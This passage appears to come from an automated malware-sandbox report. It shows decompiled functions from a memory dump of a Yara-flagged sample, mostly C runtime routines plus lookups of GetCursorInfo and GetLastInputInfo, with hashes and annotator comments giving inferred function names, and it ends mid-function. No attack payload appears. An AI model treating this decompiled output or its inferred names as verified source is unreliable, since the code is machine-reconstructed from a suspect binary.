                                    • API ID: AddressHandleModuleProc
                                    • String ID: GetCursorInfo$User32.dll
                                    • API String ID: 1646373207-2714051624
                                    • Opcode ID: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
                                    • Instruction ID: 2d5915eac24d434730a095519f9524ab5112888a720461ae5624eff83defc800
                                    • Opcode Fuzzy Hash: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
                                    • Instruction Fuzzy Hash: AAB092B0582B10ABC6007FA0AD0D9087AB4E658B43B2000B3B102C39E5EBB881209F1F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00401468() {
                                    				_Unknown_base(*)()* _t2;
                                    
                                    				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
                                    				 *0x46ca80 = _t2;
                                    				return _t2;
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401472
                                    • GetProcAddress.KERNEL32(00000000), ref: 00401479
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetLastInputInfo$User32.dll
                                    • API String ID: 2574300362-1519888992
                                    • Opcode ID: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
                                    • Instruction ID: efdeec6c1e0f4d8d8c2c1c08f07324648747689b8805d4bbb4dbcfd19e195539
                                    • Opcode Fuzzy Hash: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
                                    • Instruction Fuzzy Hash: F8B092B05427049BC740AFF0AC4DA087A78B644F43B1001A6F142825E9EBB88110AA2F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00401485() {
                                    				_Unknown_base(*)()* _t2;
                                    
                                    				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                                    				 *0x46ca84 = _t2;
                                    				return _t2;
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040148F
                                    • GetProcAddress.KERNEL32(00000000), ref: 00401496
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetConsoleWindow$kernel32.dll
                                    • API String ID: 2574300362-100875112
                                    • Opcode ID: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
                                    • Instruction ID: d846cdfbb623d578af620becd0756bbfaced08f68ce80228df047fade16f1a3c
                                    • Opcode Fuzzy Hash: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
                                    • Instruction Fuzzy Hash: D6B092B05433049BC7509FB0AE5DA097B79A604F87B1000A6F641821E9EEB881009A2F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E0045029A(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                    				int _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t16;
                                    				signed int _t17;
                                    				int _t20;
                                    				signed int _t21;
                                    				int _t23;
                                    				signed int _t25;
                                    				int _t28;
                                    				intOrPtr* _t30;
                                    				int _t34;
                                    				int _t35;
                                    				void* _t36;
                                    				intOrPtr* _t37;
                                    				intOrPtr* _t38;
                                    				int _t46;
                                    				void* _t54;
                                    				void* _t56;
                                    				signed int _t58;
                                    				int _t61;
                                    				int _t63;
                                    				void* _t64;
                                    				void* _t65;
                                    				void* _t66;
                                    
                                    				_t58 = __edx;
                                    				_t59 = _a4;
                                    				_t61 = 0;
                                    				_t16 = L00445A9E(_a4, 0, 0, 1);
                                    				_v20 = _t16;
                                    				_v16 = __edx;
                                    				_t65 = _t64 + 0x10;
                                    				if((_t16 & __edx) != 0xffffffff) {
					_t17 = L00445A9E(_t59, 0, 0, 2);     // seek to SEEK_END: current file size in edx:eax
                                    					_t66 = _t65 + 0x10;
                                    					_t51 = _t17 & __edx;
                                    					__eflags = (_t17 & __edx) - 0xffffffff;
                                    					if((_t17 & __edx) == 0xffffffff) {
                                    						goto L1;
                                    					}
					_t46 = _a8 - _t17;                   // extension = requested size - current size (64-bit: low here, ...
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");                 // ... high dword with borrow)
					_v8 = _t20;
                                    					if(__eflags < 0) {
                                    						L24:
                                    						__eflags = _t20 - _t61;
                                    						if(__eflags > 0) {
                                    							L19:
                                    							_t21 = L00445A9E(_t59, _v20, _v16, _t61);
                                    							__eflags = (_t21 & _t58) - 0xffffffff;
                                    							if((_t21 & _t58) != 0xffffffff) {
                                    								_t23 = 0;
                                    								__eflags = 0;
                                    								L31:
                                    								return _t23;
                                    							}
                                    							L20:
							_t23 =  *((intOrPtr*)(L0043A504()));   // return errno (L0043A504 inferred to be _errno())
                                    							goto L31;
                                    						}
                                    						if(__eflags < 0) {
                                    							L27:
                                    							_t25 = L00445A9E(_t59, _a8, _a12, _t61);
                                    							_t66 = _t66 + 0x10;
                                    							__eflags = (_t25 & _t58) - 0xffffffff;
                                    							if((_t25 & _t58) == 0xffffffff) {
                                    								goto L20;
                                    							}
							_t28 = SetEndOfFile(L00448718(_t59));   // truncate at the new position; L00448718 inferred _get_osfhandle(fh)
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;                        // success: seek back to the saved position
							}
							 *((intOrPtr*)(L0043A504())) = 0xd;    // errno = EACCES (13)
							_t30 = E0043A4F1();                  // inferred __doserrno()
							 *_t30 = GetLastError();             // _doserrno = Win32 error of SetEndOfFile
							goto L20;
                                    						}
                                    						__eflags = _t46 - _t61;
                                    						if(_t46 >= _t61) {
                                    							goto L19;
                                    						}
                                    						goto L27;
                                    					}
                                    					if(__eflags > 0) {
                                    						L6:
						_t63 = E0043F348(_t51, 0x1000, 1);   // inferred calloc(0x1000, 1): zero-filled block used to extend the file
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = L0043DB54(_t54, _t59, 0x8000);   // inferred _setmode_nolock(fh, _O_BINARY); previous mode saved in _v12
                                    							_t34 = _v8;
                                    							_pop(_t56);
                                    							do {
                                    								__eflags = _t34;
                                    								if(__eflags < 0) {
                                    									L13:
                                    									_t35 = _t46;
                                    									L14:
									_t36 = E004451E9(_t46, _t59, _t63, _t59, _t63, _t35);   // inferred _write_nolock(fh, zeros, min(remaining, 0x1000))
                                    									_t66 = _t66 + 0xc;
                                    									__eflags = _t36 - 0xffffffff;
                                    									if(_t36 == 0xffffffff) {
										_t37 = E0043A4F1();             // inferred __doserrno()
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {               // ERROR_ACCESS_DENIED (5) ...
											 *((intOrPtr*)(L0043A504())) = 0xd;   // ... is reported as errno EACCES (13)
                                    										}
                                    										L23:
                                    										_t38 = L0043A504();
                                    										E004401F5(_t63);
                                    										_t23 =  *_t38;
                                    										goto L31;
                                    									}
                                    									asm("cdq");
                                    									_t46 = _t46 - _t36;
                                    									_t34 = _v8;
                                    									asm("sbb eax, edx");
                                    									_v8 = _t34;
                                    									__eflags = _t34;
                                    									if(__eflags > 0) {
                                    										L12:
                                    										_t35 = 0x1000;
                                    										goto L14;
                                    									}
                                    									if(__eflags < 0) {
                                    										break;
                                    									}
                                    									goto L17;
                                    								}
                                    								if(__eflags > 0) {
                                    									goto L12;
                                    								}
                                    								__eflags = _t46 - 0x1000;
                                    								if(_t46 < 0x1000) {
                                    									goto L13;
                                    								}
                                    								goto L12;
                                    								L17:
                                    								__eflags = _t46;
                                    							} while (_t46 != 0);
							L0043DB54(_t56, _t59, _v12);         // restore the saved file mode
							E004401F5(_t63);                     // inferred free() of the zero buffer (API ID "_free" below)
                                    							_t66 = _t66 + 0xc;
                                    							_t61 = 0;
                                    							__eflags = 0;
                                    							goto L19;
                                    						}
						 *((intOrPtr*)(L0043A504())) = 0xc;     // calloc failed: errno = ENOMEM (12)
                                    						goto L23;
                                    					}
                                    					__eflags = _t46;
                                    					if(_t46 <= 0) {
                                    						goto L24;
                                    					}
                                    					goto L6;
                                    				}
                                    				L1:
                                    				return  *((intOrPtr*)(L0043A504()));
			}

                                    Instruction addresses for the 136 statement lines above, in order (column flattened by extraction; 0x00000000 = no instruction for that line):
                                    0x0045029a 0x004502a4 0x004502a7 0x004502ae 0x004502b5 0x004502ba 0x004502bd 0x004502c3
                                    0x004502d6 0x004502dd 0x004502e0 0x004502e2 0x004502e5 0x00000000 0x00000000 0x004502eb
                                    0x004502eb 0x004502ed 0x004502f0 0x004502f2 0x004502f5 0x004503d3 0x004503d3 0x004503d5
                                    0x0045038c 0x00450394 0x0045039e 0x004503a1 0x00450422 0x00450422 0x00450424 0x00000000
                                    0x00450424 0x004503a3 0x004503a8 0x00000000 0x004503a8 0x004503d7 0x004503dd 0x004503e5
                                    0x004503ec 0x004503ef 0x004503f2 0x00000000 0x00000000 0x004503fc 0x00450402 0x00450404
                                    0x00000000 0x00000000 0x0045040b 0x00450411 0x0045041e 0x00000000 0x0045041e 0x004503d9
                                    0x004503db 0x00000000 0x00000000 0x00000000 0x004503db 0x004502fb 0x00450305 0x00450311
                                    0x00450314 0x00450315 0x00450317 0x00450335 0x00450338 0x0045033b 0x0045033c 0x0045033c
                                    0x0045033e 0x00450351 0x00450351 0x00450353 0x00450356 0x0045035b 0x0045035e 0x00450361
                                    0x004503ac 0x004503b1 0x004503b4 0x004503bb 0x004503bb 0x004503c1 0x004503c1 0x004503c9
                                    0x004503cf 0x00000000 0x004503cf 0x00450363 0x00450364 0x00450366 0x00450369 0x0045036b
                                    0x0045036e 0x00450370 0x0045034a 0x0045034a 0x00000000 0x0045034a 0x00450372 0x00000000
                                    0x00000000 0x00000000 0x00450372 0x00450340 0x00000000 0x00000000 0x00450342 0x00450348
                                    0x00000000 0x00000000 0x00000000 0x00450374 0x00450374 0x00450374 0x0045037c 0x00450382
                                    0x00450387 0x0045038a 0x0045038a 0x00000000 0x0045038a 0x0045031e 0x00000000 0x0045031e
                                    0x004502fd 0x004502ff 0x00000000 0x00000000 0x00000000 0x004502ff 0x004502c5 0x00000000

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 831bbabb277ed683657504183459677247b461b82b5b035bb98d9dc5ede02f09
                                    • Instruction ID: ec6e5165c6e0660f46293b9fdcc1e9d4cfa0c4fde508876c15d21b96f536f29c
                                    • Opcode Fuzzy Hash: 831bbabb277ed683657504183459677247b461b82b5b035bb98d9dc5ede02f09
                                    • Instruction Fuzzy Hash: A9417D35A00500ABDB206FBA8C45A6F3BA4EF45376F14065FFC18D7293D67C8815866E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 95%
			// Matches MSVCRT _gmtime64_s(struct tm *ptm, const __time64_t *ptime): converts a 64-bit
			// Unix time to UTC broken-down time and returns 0, or EINVAL (0x16) on a null argument or
			// an out-of-range time. Field offsets written through _t101 follow struct tm: +0 sec,
			// +4 min, +8 hour, +0xc mday, +0x10 mon, +0x14 year, +0x18 wday, +0x1c yday, +0x20 isdst.
			// Callee names in the comments are inferred from this match, not recovered from symbols.
			E0043C481(void* _a4, intOrPtr* _a8) {
                                    				char _v5;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				signed int _t44;
                                    				char _t47;
                                    				intOrPtr _t50;
                                    				signed int _t52;
                                    				signed int _t56;
                                    				signed int _t57;
                                    				void* _t59;
                                    				signed int _t63;
                                    				signed int _t65;
                                    				char _t67;
                                    				intOrPtr* _t68;
                                    				intOrPtr* _t69;
                                    				intOrPtr* _t71;
                                    				intOrPtr _t75;
                                    				void* _t76;
                                    				void* _t77;
                                    				signed int _t80;
                                    				intOrPtr _t82;
                                    				void* _t86;
                                    				signed int _t87;
                                    				void* _t89;
                                    				signed int _t91;
                                    				intOrPtr* _t98;
                                    				void* _t101;
                                    				intOrPtr _t102;
                                    				intOrPtr _t103;
                                    
                                    				_t101 = _a4;
                                    				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);   // fill all 9 dwords of struct tm with -1
                                    					_t98 = _a8;
                                    					__eflags = _t98;
                                    					if(_t98 != 0) {
                                    						_t82 =  *((intOrPtr*)(_t98 + 4));
                                    						_t47 =  *_t98;
                                    						_v16 = _t47;
                                    						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;   // 64-bit range check on *ptime, high dword first
						if(__eflags > 0) {              // hi > -1: non-negative time, go to the upper-bound test
                                    							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;     // upper bound is 0x7934126cf (hi 7, lo 0x934126cf)
							if(__eflags < 0) {          // hi < 7: in range
                                    								L12:
                                    								_v5 = 0;
								_t50 = L0043C5CE(_t82, __eflags,  &_v16,  &_v5);   // year helper: returns tm_year, leaves seconds-into-year in _v16/_v12, leap flag in _v5
                                    								_t75 = _v16;
                                    								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = L00450BC0(_t75, _v12, 0x15180, 0);   // seconds-into-year / 86400 (inferred 64-bit _alldiv) = day of year
								 *(_t101 + 0x1c) = _t52;                      // tm_yday
								_t86 = 0x4591d8;                              // month-end day-of-year table, leap-year variant (inferred)
								_t76 = _t75 - _t52 * 0x15180;                 // seconds left in the current day
                                    								asm("sbb eax, edx");
                                    								__eflags = _v5;
                                    								if(_v5 == 0) {
									_t86 = 0x4591a4;                          // non-leap table when the leap flag is clear (inferred)
                                    								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {   // find the first table entry >= yday
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;                                                   // tm_mon (0-based)
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));    // tm_mday = yday - days before the month
									_t59 = L00450BC0( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);   // days since 1970-01-01
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;   // tm_wday: the epoch was a Thursday (4)
									_t63 = L00450BC0(_t76, _v12, 0xe10, 0);   // remaining seconds / 3600
									 *(_t101 + 8) = _t63;                       // tm_hour
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = L00450BC0(_t77, _v12, 0x3c, 0);    // remaining seconds / 60
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;   // tm_isdst = 0 (UTC)
									 *(_t101 + 4) = _t65;                       // tm_min
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;               // tm_sec; return 0
                                    									L17:
                                    									return _t67;
                                    								} else {
                                    									do {
                                    										_t56 = _t56 + 1;
                                    										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                                    									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                                    									goto L16;
                                    								}
                                    							}
                                    							if(__eflags > 0) {
                                    								L10:
								_t68 = L0043A504();         // inferred _errno()
								_t102 = 0x16;
								 *_t68 = _t102;             // errno = EINVAL (22) for an out-of-range time
                                    								L11:
                                    								_t67 = _t102;
                                    								goto L17;
                                    							}
							__eflags = _t47 - 0x934126cf;   // hi == 7: low dword must not exceed 0x934126cf
							if(__eflags <= 0) {
                                    								goto L12;
                                    							}
                                    							goto L10;
                                    						}
                                    						if(__eflags < 0) {
                                    							goto L10;
                                    						}
						__eflags = _t47 - 0xffff5740;   // hi == -1: low dword must be >= 0xffff5740, i.e. time >= -12 hours
						if(_t47 < 0xffff5740) {
                                    							goto L10;
                                    						}
                                    						goto L7;
                                    					}
                                    					_t69 = L0043A504();
                                    					_t102 = 0x16;
                                    					 *_t69 = _t102;
					L0043695D();                // inferred _invalid_parameter_noinfo(): null *ptime
                                    					goto L11;
                                    				}
                                    				_t71 = L0043A504();
                                    				_t103 = 0x16;
                                    				 *_t71 = _t103;
                                    				L0043695D();
                                    				return _t103;
			}

                                    Instruction addresses for the 98 statement lines above, in order (column flattened by extraction; 0x00000000 = no instruction for that line):
                                    0x0043c48a 0x0043c48f 0x0043c4af 0x0043c4b0 0x0043c4b2 0x0043c4b5 0x0043c4b7 0x0043c4ca
                                    0x0043c4cd 0x0043c4cf 0x0043c4d2 0x0043c4d5 0x0043c4d8 0x0043c4e3 0x0043c4e5 0x0043c4e6
                                    0x0043c4e8 0x0043c504 0x0043c508 0x0043c511 0x0043c516 0x0043c51d 0x0043c52a 0x0043c52f
                                    0x0043c539 0x0043c53e 0x0043c543 0x0043c545 0x0043c54c 0x0043c54e 0x0043c54e 0x0043c553
                                    0x0043c558 0x0043c559 0x0043c55c 0x0043c564 0x0043c564 0x0043c565 0x0043c573 0x0043c57b
                                    0x0043c588 0x0043c589 0x0043c593 0x0043c599 0x0043c5a3 0x0043c5aa 0x0043c5ae 0x0043c5b2
                                    0x0043c5b7 0x0043c5bb 0x0043c5c3 0x0043c5c3 0x0043c5c5 0x0043c5c8 0x00000000 0x0043c55e
                                    0x0043c55e 0x0043c55e 0x0043c55f 0x0043c55f 0x00000000 0x0043c55e 0x0043c55c 0x0043c4ea
                                    0x0043c4f3 0x0043c4f3 0x0043c4fa 0x0043c4fb 0x0043c4fd 0x0043c4fd 0x00000000 0x0043c4fd
                                    0x0043c4ec 0x0043c4f1 0x00000000 0x00000000 0x00000000 0x0043c4f1 0x0043c4da 0x00000000
                                    0x00000000 0x0043c4dc 0x0043c4e1 0x00000000 0x00000000 0x00000000 0x0043c4e1 0x0043c4b9
                                    0x0043c4c0 0x0043c4c1 0x0043c4c3 0x00000000 0x0043c4c3 0x0043c491 0x0043c498 0x0043c499
                                    0x0043c49b 0x00000000

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
                                    • Instruction ID: 733164f05b9f7aeaec00074263a2a0c70db5c9dd2c0fe6a7367e2e5b9d18385d
                                    • Opcode Fuzzy Hash: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
                                    • Instruction Fuzzy Hash: 20412972600714BFD7249F78CC81B6ABBE8EB8C714F10952FF111EB281D779A9018B84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
			// Consistent with MSVCRT __wtomb_environ(): walks the NULL-terminated wide-string array at
			// *0x46b4d4 (inferred _wenviron), converts each entry to the ANSI code page and hands it to
			// the narrow-environment setter. Returns 0 on success, -1 on a conversion or allocation
			// failure. Callee names in the comments are inferred, not recovered from symbols.
			E0043D288(signed int __eax, void* __ecx) {
                                    				signed int _t2;
                                    				signed int _t3;
                                    				int _t10;
                                    				int _t11;
                                    				void* _t13;
                                    				short** _t16;
                                    				char* _t19;
                                    				void* _t20;
                                    
                                    				_t13 = __ecx;
				_t16 =  *0x46b4d4; // 0x337edc0   (wchar_t** table of environment strings, inferred _wenviron)
                                    				if(_t16 != 0) {
                                    					_t10 = 0;
                                    					while( *_t16 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);   // CP_ACP size query for the NUL-terminated string
                                    						_t11 = _t2;
                                    						if(_t11 == 0) {
                                    							L11:
                                    							_t3 = _t2 | 0xffffffff;
                                    						} else {
							_t19 = E0043F348(_t13, _t11, 1);   // inferred calloc(size, 1) for the narrow copy
                                    							_pop(_t13);
                                    							if(_t19 == 0) {
                                    								L10:
                                    								_t2 = E004401F5(_t19);
                                    								goto L11;
                                    							} else {
                                    								_t10 = 0;
							if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {   // actual conversion into the buffer
                                    									goto L10;
                                    								} else {
								_push(0);                // primary = 0: not the initial environment setup
								_push(_t19);             // the converted string
								L00447D3F();             // inferred __crtsetenv(): install it in the narrow environment
								E004401F5(0);            // inferred free() of the temporary buffer
                                    									_t20 = _t20 + 0xc;
                                    									_t16 =  &(_t16[1]);
                                    									continue;
                                    								}
                                    							}
                                    						}
                                    						L9:
                                    						return _t3;
                                    						goto L12;
                                    					}
                                    					_t3 = 0;
                                    					goto L9;
                                    				} else {
                                    					return __eax | 0xffffffff;
                                    				}
                                    				L12:
                                    			}

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db438a00ac30559f4f193afadc31410c96385359a40aac0a007d396ff2af39bb
                                    • Instruction ID: e4b0062e58d0d7237c716dd182029255e048b2798701f0240ba592bb915f7d8f
                                    • Opcode Fuzzy Hash: db438a00ac30559f4f193afadc31410c96385359a40aac0a007d396ff2af39bb
                                    • Instruction Fuzzy Hash: 5101F2B2A097063EF6212A783CC1F27220CDF453B8F341B6BF521622D5DE78CC014168
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E0043D307(signed int __eax, void* __ecx) {
                                    				signed int _t2;
                                    				signed int _t3;
                                    				int _t10;
                                    				int _t11;
                                    				void* _t13;
                                    				char** _t16;
                                    				short* _t19;
                                    				void* _t20;
                                    
                                    				_t13 = __ecx;
                                    				_t16 =  *0x46b4d0; // 0x3369790
                                    				if(_t16 != 0) {
                                    					_t10 = 0;
                                    					while( *_t16 != _t10) {
                                    						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
                                    						_t11 = _t2;
                                    						if(_t11 == 0) {
                                    							L11:
                                    							_t3 = _t2 | 0xffffffff;
                                    						} else {
                                    							_t19 = E0043F348(_t13, _t11, 2);
                                    							_pop(_t13);
                                    							if(_t19 == 0) {
                                    								L10:
                                    								_t2 = E004401F5(_t19);
                                    								goto L11;
                                    							} else {
                                    								_t10 = 0;
                                    								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
                                    									goto L10;
                                    								} else {
                                    									_push(0);
                                    									_push(_t19);
                                    									L00447D4A(_t13);
                                    									E004401F5(0);
                                    									_t20 = _t20 + 0xc;
                                    									_t16 =  &(_t16[1]);
                                    									continue;
                                    								}
                                    							}
                                    						}
                                    						L9:
                                    						return _t3;
                                    						goto L12;
                                    					}
                                    					_t3 = 0;
                                    					goto L9;
                                    				} else {
                                    					return __eax | 0xffffffff;
                                    				}
                                    				L12:
                                    			}

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 35b35c0bef6846c723b1eec02a1325ea3f2ea48b9f05e2900ff3fad41c018c60
                                    • Instruction ID: af3406132430cef04dbb00c021b8739ed0fb4e326e8fb5295b0caa8951ed8692
                                    • Opcode Fuzzy Hash: 35b35c0bef6846c723b1eec02a1325ea3f2ea48b9f05e2900ff3fad41c018c60
                                    • Instruction Fuzzy Hash: 6D0167B29096167AA71125797CC1D6B631CEF553B9B20132BB921512D1DA78CC114169
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 95%
                                    			E00442033(signed int _a4) {
                                    				signed int _t9;
                                    				void* _t13;
                                    				signed int _t15;
                                    				WCHAR* _t22;
                                    				signed int _t24;
                                    				signed int* _t25;
                                    				void* _t27;
                                    
                                    				_t9 = _a4;
                                    				_t25 = 0x46b658 + _t9 * 4;
                                    				_t24 =  *_t25;
                                    				if(_t24 == 0) {
                                    					_t22 =  *(0x458b78 + _t9 * 4);
                                    					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                    					if(_t27 != 0) {
                                    						L8:
                                    						 *_t25 = _t27;
                                    						if( *_t25 != 0) {
                                    							FreeLibrary(_t27);
                                    						}
                                    						_t13 = _t27;
                                    						L11:
                                    						return _t13;
                                    					}
                                    					_t15 = GetLastError();
                                    					if(_t15 != 0x57) {
                                    						_t27 = 0;
                                    					} else {
                                    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                    						_t27 = _t15;
                                    					}
                                    					if(_t27 != 0) {
                                    						goto L8;
                                    					} else {
                                    						 *_t25 = _t15 | 0xffffffff;
                                    						_t13 = 0;
                                    						goto L11;
                                    					}
                                    				}
                                    				_t4 = _t24 + 1; // 0xbd45ae93
                                    				asm("sbb eax, eax");
                                    				return  ~_t4 & _t24;
                                    			}

                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0046C518,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue), ref: 00442065
                                    • GetLastError.KERNEL32(?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000,00000364,?,00441DB4), ref: 00442071
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000), ref: 0044207F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
                                    • Instruction ID: 1f93bee859a7bc905b4f209078c92e3314857c5c8a056cdaea3c14562744cb27
                                    • Opcode Fuzzy Hash: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
                                    • Instruction Fuzzy Hash: EC01D432601723ABD7314E789D44A6777D8AF55BA2BA00632FB06D3241DB64D801C6E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 92%
                                    			E00447399(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                    				signed int _v8;
                                    				char _v22;
                                    				char _v28;
                                    				signed int _v32;
                                    				signed int _v36;
                                    				signed int _t48;
                                    				int _t51;
                                    				signed int _t54;
                                    				signed int _t55;
                                    				short _t58;
                                    				signed char _t62;
                                    				signed int _t63;
                                    				signed char* _t72;
                                    				signed char* _t73;
                                    				int _t78;
                                    				signed int _t81;
                                    				signed char* _t82;
                                    				short* _t83;
                                    				int _t87;
                                    				signed char _t88;
                                    				signed int _t89;
                                    				signed int _t91;
                                    				signed int _t92;
                                    				int _t94;
                                    				int _t95;
                                    				intOrPtr _t98;
                                    				signed int _t99;
                                    
                                    				_t48 =  *0x46a00c; // 0xbd45ae92
                                    				_v8 = _t48 ^ _t99;
                                    				_t98 = _a8;
                                    				_t78 = L00446F6C(__eflags, _a4);
                                    				if(_t78 != 0) {
                                    					_t94 = 0;
                                    					__eflags = 0;
                                    					_t81 = 0;
                                    					_t51 = 0;
                                    					_v32 = 0;
                                    					while(1) {
                                    						__eflags =  *((intOrPtr*)(_t51 + 0x46a488)) - _t78;
                                    						if( *((intOrPtr*)(_t51 + 0x46a488)) == _t78) {
                                    							break;
                                    						}
                                    						_t81 = _t81 + 1;
                                    						_t51 = _t51 + 0x30;
                                    						_v32 = _t81;
                                    						__eflags = _t51 - 0xf0;
                                    						if(_t51 < 0xf0) {
                                    							continue;
                                    						} else {
                                    							__eflags = _t78 - 0xfde8;
                                    							if(_t78 == 0xfde8) {
                                    								L23:
                                    							} else {
                                    								__eflags = _t78 - 0xfde9;
                                    								if(_t78 == 0xfde9) {
                                    									goto L23;
                                    								} else {
                                    									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
                                    									__eflags = _t51;
                                    									if(_t51 == 0) {
                                    										goto L23;
                                    									} else {
                                    										_t7 =  &_v28; // 0x44723a
                                    										_t51 = GetCPInfo(_t78, _t7);
                                    										__eflags = _t51;
                                    										if(_t51 == 0) {
                                    											__eflags =  *0x46ba28 - _t94; // 0x0
                                    											if(__eflags == 0) {
                                    												goto L23;
                                    											} else {
                                    												L00446FDF(_t98);
                                    												goto L37;
                                    											}
                                    										} else {
                                    											L00431F00(_t94, _t98 + 0x18, _t94, 0x101);
                                    											 *(_t98 + 4) = _t78;
